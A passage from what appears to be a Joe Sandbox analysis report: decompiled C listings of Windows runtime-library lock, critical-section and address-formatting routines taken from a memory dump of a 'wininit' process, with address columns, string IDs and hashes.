                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                										_t119 = _t96 + 0x24;
                                                										_t107 = 1;
                                                										asm("lock xadd [eax], ecx");
                                                										_t56 =  *(_t96 + 0x28);
                                                										_a4 = _t56;
                                                										__eflags = _t56;
                                                										if(_t56 != 0) {
                                                											L40:
                                                											_t128 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                												asm("sbb esi, esi");
                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026001c0;
                                                												_push(_t138);
                                                												_push(0);
                                                												_t58 = E0251F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                												__eflags = _t58 - 0x102;
                                                												if(_t58 != 0x102) {
                                                													break;
                                                												}
                                                												_t107 =  *(_t138 + 4);
                                                												_t125 =  *_t138;
                                                												_t75 = E02564FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                												_push(_t125);
                                                												_push(_t75);
                                                												E02573F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                												E02573F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                												_t128 = _t128 + 1;
                                                												_t159 = _t158 + 0x28;
                                                												__eflags = _t128 - 2;
                                                												if(__eflags > 0) {
                                                													E025A217A(_t107, __eflags, _t96);
                                                												}
                                                												_push("RTL: Re-Waiting\n");
                                                												_push(0);
                                                												_push(0x65);
                                                												E02573F92();
                                                												_t158 = _t159 + 0xc;
                                                											}
                                                											__eflags = _t58;
                                                											if(__eflags < 0) {
                                                												_push(_t58);
                                                												E02563915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                												asm("int3");
                                                												_t61 =  *_t107;
                                                												 *_t107 = 0;
                                                												__eflags = _t61;
                                                												if(_t61 == 0) {
                                                													L1:
                                                													_t63 = E02545384(_t138 + 0x24);
                                                													if(_t63 != 0) {
                                                														goto L52;
                                                													} else {
                                                														goto L2;
                                                													}
                                                												} else {
                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                													_push( &_a4);
                                                													_push(_t61);
                                                													_t70 = E0251F970( *((intOrPtr*)(_t138 + 0x18)));
                                                													__eflags = _t70;
                                                													if(__eflags >= 0) {
                                                														goto L1;
                                                													} else {
                                                														_push(_t70);
                                                														E02563915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                														L52:
                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                														_push( &_a4);
                                                														_push(1);
                                                														_t63 = E0251F970( *((intOrPtr*)(_t138 + 0x20)));
                                                														__eflags = _t63;
                                                														if(__eflags >= 0) {
                                                															L2:
                                                															return _t63;
                                                														} else {
                                                															_push(_t63);
                                                															E02563915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                															_push( &_a4);
                                                															_push(1);
                                                															_t63 = E0251F970( *((intOrPtr*)(_t138 + 0x20)));
                                                															__eflags = _t63;
                                                															if(__eflags >= 0) {
                                                																goto L2;
                                                															} else {
                                                																_push(_t63);
                                                																_t66 = E02563915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                																asm("int3");
                                                																while(1) {
                                                																	_t110 = _t66;
                                                																	__eflags = _t66 - 1;
                                                																	if(_t66 != 1) {
                                                																		break;
                                                																	}
                                                																	_t128 = _t128 | 0xffffffff;
                                                																	_t66 = _t110;
                                                																	asm("lock cmpxchg [ebx], edi");
                                                																	__eflags = _t66 - _t110;
                                                																	if(_t66 != _t110) {
                                                																		continue;
                                                																	} else {
                                                																		_t67 =  *[fs:0x18];
                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                																		return _t67;
                                                																	}
                                                																	goto L59;
                                                																}
                                                																E02545329(_t110, _t138);
                                                																_t69 = E025453A5(_t138, 1);
                                                																return _t69;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_t56 =  *(_t96 + 0x28);
                                                												goto L3;
                                                											}
                                                										} else {
                                                											_t107 =  *_t119;
                                                											__eflags = _t107;
                                                											if(__eflags > 0) {
                                                												while(1) {
                                                													_t81 = _t107;
                                                													asm("lock cmpxchg [edi], esi");
                                                													__eflags = _t81 - _t107;
                                                													if(_t81 == _t107) {
                                                														break;
                                                													}
                                                													_t107 = _t81;
                                                													__eflags = _t81;
                                                													if(_t81 > 0) {
                                                														continue;
                                                													}
                                                													break;
                                                												}
                                                												_t56 = _a4;
                                                												__eflags = _t107;
                                                											}
                                                											if(__eflags != 0) {
                                                												while(1) {
                                                													L3:
                                                													__eflags = _t56;
                                                													if(_t56 != 0) {
                                                														goto L32;
                                                													}
                                                													_t107 = _t107 | 0xffffffff;
                                                													_t56 = 0;
                                                													asm("lock cmpxchg [edx], ecx");
                                                													__eflags = 0;
                                                													if(0 != 0) {
                                                														continue;
                                                													} else {
                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                														return 1;
                                                													}
                                                													goto L59;
                                                												}
                                                												continue;
                                                											} else {
                                                												goto L40;
                                                											}
                                                										}
                                                										goto L59;
                                                									}
                                                									__eflags = 0;
                                                									return 0;
                                                								} else {
                                                									_t115 =  *(_t96 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t106 =  *_t49;
                                                								__eflags = _t106;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t93 = _t106;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t93 - _t106;
                                                										if(_t93 == _t106) {
                                                											break;
                                                										}
                                                										_t106 = _t93;
                                                										__eflags = _t93;
                                                										if(_t93 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									__eflags = _t106;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						}
                                                						goto L59;
                                                					}
                                                					_t84 = _t115;
                                                					asm("lock cmpxchg [esi], ecx");
                                                					__eflags = _t84 - _t115;
                                                					if(_t84 != _t115) {
                                                						_t115 = _t84;
                                                						goto L7;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				L59:
                                                			}
                                                Instruction address column for the decompiled function above (addresses detached from their code lines; they range from 0x02545367 to 0x025823d7 within the dump based at 0x02500000, with 0x00000000 marking unresolved lines).

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02582206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a39e3a36ae9f20320f6198f8b56f820aa8bbefd7f323b2437e1d6ee0f3238df8
                                                • Instruction ID: e59ebed5dac3772d70b50552cc3b2222d6300ec0237edfa0b95d685e19600b15
                                                • Opcode Fuzzy Hash: a39e3a36ae9f20320f6198f8b56f820aa8bbefd7f323b2437e1d6ee0f3238df8
                                                • Instruction Fuzzy Hash: B6515E717002526FEB14DE14CC85F663BAABFD4724F214259EC05EB2C4EA71EC418B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E025614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                				signed int _v8;
                                                				char _v10;
                                                				char _v140;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t24;
                                                				void* _t26;
                                                				signed int _t29;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				intOrPtr _t45;
                                                				void* _t51;
                                                				intOrPtr* _t52;
                                                				void* _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                
                                                				_t51 = __edx;
                                                				_t24 =  *0x2602088; // 0x764b2ec1
                                                				_v8 = _t24 ^ _t57;
                                                				_t45 = _a16;
                                                				_t53 = _a4;
                                                				_t52 = _a20;
                                                				if(_a4 == 0 || _t52 == 0) {
                                                					L10:
                                                					_t26 = 0xc000000d;
                                                				} else {
                                                					if(_t45 == 0) {
                                                						if( *_t52 == _t45) {
                                                							goto L3;
                                                						} else {
                                                							goto L10;
                                                						}
                                                					} else {
                                                						L3:
                                                						_t28 =  &_v140;
                                                						if(_a12 != 0) {
                                                							_push("[");
                                                							_push(0x41);
                                                							_push( &_v140);
                                                							_t29 = E02557707();
                                                							_t58 = _t58 + 0xc;
                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                						}
                                                						_t54 = E025613CB(_t53, _t28);
                                                						if(_a8 != 0) {
                                                							_t34 = E02557707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t34 * 2;
                                                						}
                                                						if(_a12 != 0) {
                                                							_t40 = E02557707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t40 * 2;
                                                						}
                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                						 *_t52 = _t53;
                                                						if( *_t52 < _t53) {
                                                							goto L10;
                                                						} else {
                                                							E02522340(_t45,  &_v140, _t53 + _t53);
                                                							_t26 = 0;
                                                						}
                                                					}
                                                				}
                                                				return E0252E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                			}

                                                Address column of the listing above (in listing order): 0x025614c0, 0x025614cb, 0x025614d2, 0x025614d6, 0x025614da, 0x025614de, 0x025614e3, 0x0256157a, 0x0256157a, 0x025614f1, 0x025614f3, 0x0258ea0f, 0x00000000, 0x0258ea15, 0x00000000, 0x0258ea15, 0x025614f9, 0x025614f9, 0x025614fe, 0x02561504, 0x0258ea1a, 0x0258ea1f, 0x0258ea21, 0x0258ea22, 0x0258ea27, 0x0258ea2a, 0x0258ea2a, 0x02561515, 0x02561517, 0x0256156d, 0x02561572, 0x02561575, 0x02561575, 0x0256151e, 0x0258ea50, 0x0258ea55, 0x0258ea58, 0x0258ea58, 0x0256152e, 0x02561531, 0x02561533, 0x00000000, 0x02561535, 0x02561541, 0x02561549, 0x02561549, 0x02561533, 0x025614f3, 0x02561559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0258EA22
                                                  • Part of subcall function 025613CB: ___swprintf_l.LIBCMT ref: 0256146B
                                                  • Part of subcall function 025613CB: ___swprintf_l.LIBCMT ref: 02561490
                                                • ___swprintf_l.LIBCMT ref: 0256156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 31f3d72a2fe2bb157fa0a014b5c57852b2f3930d9e93764e48d1fdf981ff282e
                                                • Instruction ID: 674a35f4b27c95525874af86a7747ae7e2cfaaf2591dda7cfb5e9efbc73a1a10
                                                • Opcode Fuzzy Hash: 31f3d72a2fe2bb157fa0a014b5c57852b2f3930d9e93764e48d1fdf981ff282e
                                                • Instruction Fuzzy Hash: 1C21B6729006299BDB20DE54DC49AFEB7BCBB64704F448555EC4AD3240DB70EA588FD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 45%
                                                			E025453A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				void* _t48;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026001c0;
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E0251F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = E02564FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                									_push(_t85);
                                                									_push(_t51);
                                                									E02573F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									E02573F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E025A217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E02573F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E02563915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E02545384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E0251F970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E02563915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E0251F970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E02563915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E0251F970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E02563915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L38;
                                                													}
                                                													E02545329(_t74, _t92);
                                                													_push(1);
                                                													_t48 = E025453A5(_t92);
                                                													return _t48;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L38;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L38:
                                                			}

                                                Address column of the listing above (in listing order): 0x025453ab, 0x025453ae, 0x025453b1, 0x025453b4, 0x025453b7, 0x025605b6, 0x025605c0, 0x025605c3, 0x00000000, 0x025605c9, 0x025605c9, 0x025605cc, 0x025605d5, 0x025605d5, 0x025453bd, 0x025453bd, 0x025453bd, 0x025453be, 0x025453be, 0x025453be, 0x025453c0, 0x00000000, 0x00000000, 0x02582269, 0x0258226d, 0x02582349, 0x0258234d, 0x02582273, 0x02582276, 0x02582279, 0x0258227e, 0x02582283, 0x02582287, 0x0258228a, 0x0258228d, 0x0258228f, 0x025822bc, 0x025822bc, 0x025822bc, 0x025822be, 0x025822c4, 0x025822cc, 0x025822d0, 0x025822d6, 0x025822d7, 0x025822da, 0x025822df, 0x025822e4, 0x00000000, 0x00000000, 0x025822e6, 0x025822e9, 0x025822f4, 0x025822f9, 0x025822fa, 0x02582305, 0x02582314, 0x02582319, 0x0258231a, 0x0258231d, 0x02582320, 0x02582323, 0x02582323, 0x02582328, 0x0258232d, 0x0258232f, 0x02582331, 0x02582336, 0x02582336, 0x0258233b, 0x0258233d, 0x02582350, 0x02582351, 0x02582356, 0x02582359, 0x02582359, 0x0258235b, 0x0258235d, 0x02545367, 0x0254536b, 0x02545372, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x02582363, 0x02582363, 0x02582369, 0x0258236a, 0x0258236c, 0x02582371, 0x02582373, 0x00000000, 0x02582379, 0x02582379, 0x0258237a, 0x0258237f, 0x0258237f, 0x02582385, 0x02582386, 0x02582389, 0x0258238e, 0x02582390, 0x02545378, 0x0254537c, 0x02582396, 0x02582396
                                                0x02582397
                                                0x0258239c
                                                0x025823a2
                                                0x025823a3
                                                0x025823a6
                                                0x025823ab
                                                0x025823ad
                                                0x00000000
                                                0x025823b3
                                                0x025823b3
                                                0x025823b4
                                                0x025823b9
                                                0x025823ba
                                                0x025823ba
                                                0x025823bc
                                                0x025823bf
                                                0x00000000
                                                0x00000000
                                                0x02579153
                                                0x02579158
                                                0x0257915a
                                                0x0257915e
                                                0x02579160
                                                0x00000000
                                                0x02579166
                                                0x02579166
                                                0x02579171
                                                0x02579176
                                                0x02579176
                                                0x00000000
                                                0x02579160
                                                0x025823c6
                                                0x025823cb
                                                0x025823ce
                                                0x025823d7
                                                0x025823d7
                                                0x025823ad
                                                0x02582390
                                                0x02582373
                                                0x0258233f
                                                0x0258233f
                                                0x00000000
                                                0x0258233f
                                                0x02582291
                                                0x02582291
                                                0x02582293
                                                0x02582295
                                                0x0258229a
                                                0x025822a1
                                                0x025822a3
                                                0x025822a7
                                                0x025822a9
                                                0x00000000
                                                0x00000000
                                                0x025822ab
                                                0x025822ad
                                                0x025822af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822af
                                                0x025822b1
                                                0x025822b4
                                                0x025822b4
                                                0x025822b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822b6
                                                0x0258228f
                                                0x00000000
                                                0x0258226d
                                                0x025453cb
                                                0x025453ce
                                                0x025453d0
                                                0x025453d4
                                                0x025453d6
                                                0x00000000
                                                0x025453d8
                                                0x025453e3
                                                0x025453ea
                                                0x025453ea
                                                0x025453d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025822F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025822FC
                                                • RTL: Resource at %p, xrefs: 0258230B
                                                • RTL: Re-Waiting, xrefs: 02582328
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 9c3a63064c9c7b950d97c3dbd498f762d5918c4f797895a42591b2bb8dc9bb21
                                                • Instruction ID: e503550f566db9d24a28ed48e06ca8ad77e9adede59fca2e336ce61110a8a699
                                                • Opcode Fuzzy Hash: 9c3a63064c9c7b950d97c3dbd498f762d5918c4f797895a42591b2bb8dc9bb21
                                                • Instruction Fuzzy Hash: 80512A716107066BEB14EF24DC84FA67799FF94728F104619FD09DB280FB61E8418F98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E0254EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				signed int _v24;
                                                				intOrPtr* _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				short _v66;
                                                				char _v72;
                                                				void* __esi;
                                                				intOrPtr _t38;
                                                				intOrPtr _t39;
                                                				signed int _t40;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t53;
                                                				signed char _t67;
                                                				void* _t72;
                                                				intOrPtr _t77;
                                                				intOrPtr* _t80;
                                                				intOrPtr _t84;
                                                				intOrPtr* _t85;
                                                				void* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_t80 = __edi;
                                                				_t75 = __edx;
                                                				_t70 = __ecx;
                                                				_t84 = _a4;
                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                					E0253DA92(__ecx, __edx, __eflags, _t84);
                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                				}
                                                				_push(0);
                                                				__eflags = _t38 - 0xffffffff;
                                                				if(_t38 == 0xffffffff) {
                                                					_t39 =  *0x260793c; // 0x0
                                                					_push(0);
                                                					_push(_t84);
                                                					_t40 = E025216C0(_t39);
                                                				} else {
                                                					_t40 = E0251F9D4(_t38);
                                                				}
                                                				_pop(_t85);
                                                				__eflags = _t40;
                                                				if(__eflags < 0) {
                                                					_push(_t40);
                                                					E02563915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                					asm("int3");
                                                					while(1) {
                                                						L21:
                                                						_t76 =  *[fs:0x18];
                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                							_v66 = 0x1722;
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_t76 =  &_v72;
                                                							_push( &_v72);
                                                							_v28 = _t85;
                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(0x10);
                                                							_push(0x20402);
                                                							E025201A4( *0x7ffe0382 & 0x000000ff);
                                                						}
                                                						while(1) {
                                                							_t43 = _v8;
                                                							_push(_t80);
                                                							_push(0);
                                                							__eflags = _t43 - 0xffffffff;
                                                							if(_t43 == 0xffffffff) {
                                                								_t71 =  *0x260793c; // 0x0
                                                								_push(_t85);
                                                								_t44 = E02521F28(_t71);
                                                							} else {
                                                								_t44 = E0251F8CC(_t43);
                                                							}
                                                							__eflags = _t44 - 0x102;
                                                							if(_t44 != 0x102) {
                                                								__eflags = _t44;
                                                								if(__eflags < 0) {
                                                									_push(_t44);
                                                									E02563915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                									asm("int3");
                                                									E025A2306(_t85);
                                                									__eflags = _t67 & 0x00000002;
                                                									if((_t67 & 0x00000002) != 0) {
                                                										_t7 = _t67 + 2; // 0x4
                                                										_t72 = _t7;
                                                										asm("lock cmpxchg [edi], ecx");
                                                										__eflags = _t67 - _t67;
                                                										if(_t67 == _t67) {
                                                											E0254EC56(_t72, _t76, _t80, _t85);
                                                										}
                                                									}
                                                									return 0;
                                                								} else {
                                                									__eflags = _v24;
                                                									if(_v24 != 0) {
                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                									}
                                                									return 2;
                                                								}
                                                								goto L36;
                                                							}
                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                							_push(_t67);
                                                							_t46 = E02564FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                							_push(_t77);
                                                							E02573F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                							_t48 =  *_t85;
                                                							_t92 = _t91 + 0x18;
                                                							__eflags = _t48 - 0xffffffff;
                                                							if(_t48 == 0xffffffff) {
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                							}
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(_t49);
                                                							_t50 = _v12;
                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                							_push(_t85);
                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
